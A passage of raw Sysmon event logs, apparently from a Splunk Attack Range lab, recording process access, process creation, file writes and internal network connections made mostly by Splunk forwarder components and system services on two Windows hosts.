Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18EC-6216-5807-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.563{C8EA50B7-18EC-6216-5807-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.199{C8EA50B7-18EB-6216-5707-000000003802}42806864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.046{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10418204EBB6F610472BD5F6631429AD,SHA256=470FB078710787F021AD349DD00E373310434DC886060AE8DDC02FC5555326F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:21.805{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9B3C7DEA43726EE673AF345D1A635A8,SHA256=4EA82BBA8DB75149D823B681B111866B2529809E7254E1EDD7F088C9B25FC0F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42FD556466FA6ED622A1F73F5DE23A0B,SHA256=A44ECB45218E91028E9C2B132C58382AA7A7AC135913573B78A5169D99906DB9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:17.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51711-false10.0.1.12-8000- 10341000x8000000000000000298540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18ED-6216-5907-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-18ED-6216-5907-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.064{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18ED-6216-5907-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:21.066{C8EA50B7-18ED-6216-5907-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:22.805{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33F59E0DDB84488E6BE7A8B9CB2AB24C,SHA256=D50981FB3D8D3A4A47ED7EB7791AB59E089067031DCD806AC02DAFF02004D12A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.611{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49535-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:22.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EA18C3D7F7F80751CE101A4031C0859,SHA256=806243EA39248603F880793525EB7083D5BBCE47889193E87B139F0B9703D6F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:23.807{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA5F955477409B8C8661AE122B1CFEDB,SHA256=E7681D9260089D2F957F971CA1391B84BC2D84A39D74331B77174360D2FA9D1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:23.163{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CA79846D0D65F68A4AB7065B1953FAF,SHA256=01DBD09195E5EDE604A5A4E990D7F05F81FDE0CFD9CF27B013D8725C77D3B8FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:24.820{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31DC7775E0A4F263CC0EB5803358FE19,SHA256=29B37D960FABB02A561E9F16A6FB84A877459378E5E0EA11CBA8203934E6F793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:24.178{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CEDAFA528484959F30279C7BA1AB406,SHA256=6FAA7DCB577F42D93C9E80C891D44890C0305E22EEDA6FA11024942EB78A72F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:25.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED714BC9ECCA78D05C1FCCC38F56608,SHA256=6AA7B3FC1E0FEDC9BCD53086EE0785A60026519C04CBA29958B56D710286682C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:25.214{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=850921F4619FEC24C4998CBEF27A0E38,SHA256=CB99F0A8D2B264DE41A4D0CA86B3DD36A1AD8FC87C019A977606196834F804DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:26.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6900C690A115D2057E44EF1990ECA4D9,SHA256=0B0BAF638D7D03481C3D5993416DE43F1A20E1A20909FA07493740B05C7CE059,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:23.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51712-false10.0.1.12-8000- 354300x8000000000000000298549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:24.694{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49536-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:27.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5FB2BE15C30A0F7279E36AD1CE527B,SHA256=618C2F0D8414E6D385724BE2C407FDC1E5DB093991CBC8F09313648AA2245227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:27.086{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F19EDBEFF52218A420D0F932D04D679,SHA256=198BBEE3C3CFE90DB9F3C233D44A15098F3E3D126BFA9B02EF965D721EA3C009,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:28.259{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AAA73B4B5B5184FCB1118BCDCC3F9DB,SHA256=51F3DEA8D6265D9CD5D4314253A055BB1A6A38D67F8F00B62525DD5F5D540F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:28.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4757683D3E9E1E71989F2ACE7FCE4B2,SHA256=38666018360A838197C9148CA3D5F7AA726DEC2AB73EB64FD7B90A5D565313AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:29.293{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF3C40E120CAF43419F9AF84EC4BCD63,SHA256=804565D6AAE07EC83A0F672A2F95478582054061B35EE2E869E31FD3F92F7383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:29.429{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9183EF326CDCF18F1042BB4F3C68FFCC,SHA256=3D86C64C83D5219BB54D5BF0CE31B0C3B7CA70F7B599C07A3FD45BA5109F2392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:30.492{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0C9EFD53F8E62A27124857CB6A610B8D,SHA256=0E62776338D1B95FC3A542D59CC61DDC6A856D4B3B8D57E8B2D3271029312B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:30.445{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6C4FF2556A40DA33AAC5B662E8D67D,SHA256=31E45B4978C4CB084F8A83B3E5901D10B2384DB13F2DE2899DBEF1CC95C0B813,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:30.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C29D16A8D797B4E5D2F30CF973CF149,SHA256=F047764EAECDF76221B3762A50EA572FAC90BE391977D51956EE7944AF3C6FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:30.007{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=70F6C6B6A6FEC152CB470B6309065852,SHA256=48F5D051AB53E543EF50D9CAFFBDAECCB4EE0361351CE6F656FED4F78713B878,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:30.007{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7983F2AAA042D9472EB6A609BE72332B,SHA256=414BA51376BE122C4A386ABA68A04BB546382BEC0FCE2C7013EB9E40A4E9157A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:31.461{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C22DBE4B951CDED05E900FD8728442C0,SHA256=12CBE5EF24C7F378702E2CFBB36DE8BB9514D23E6273B16CAA0A5BDD47E24865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:31.625{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=D1FA6262CF2F5C1FA639C696C0B20986,SHA256=7C13CD39FA813F43741E74D8CEA49869EB3714A81E78940D8E3EEEF6803414F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:31.625{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=A4C63EE9AE00B722F9F97A6A11A3F3CA,SHA256=9CF92F61C54C467AB2965C3AE762A0608332984A82BAE5D11864833611A30DEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:31.625{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla 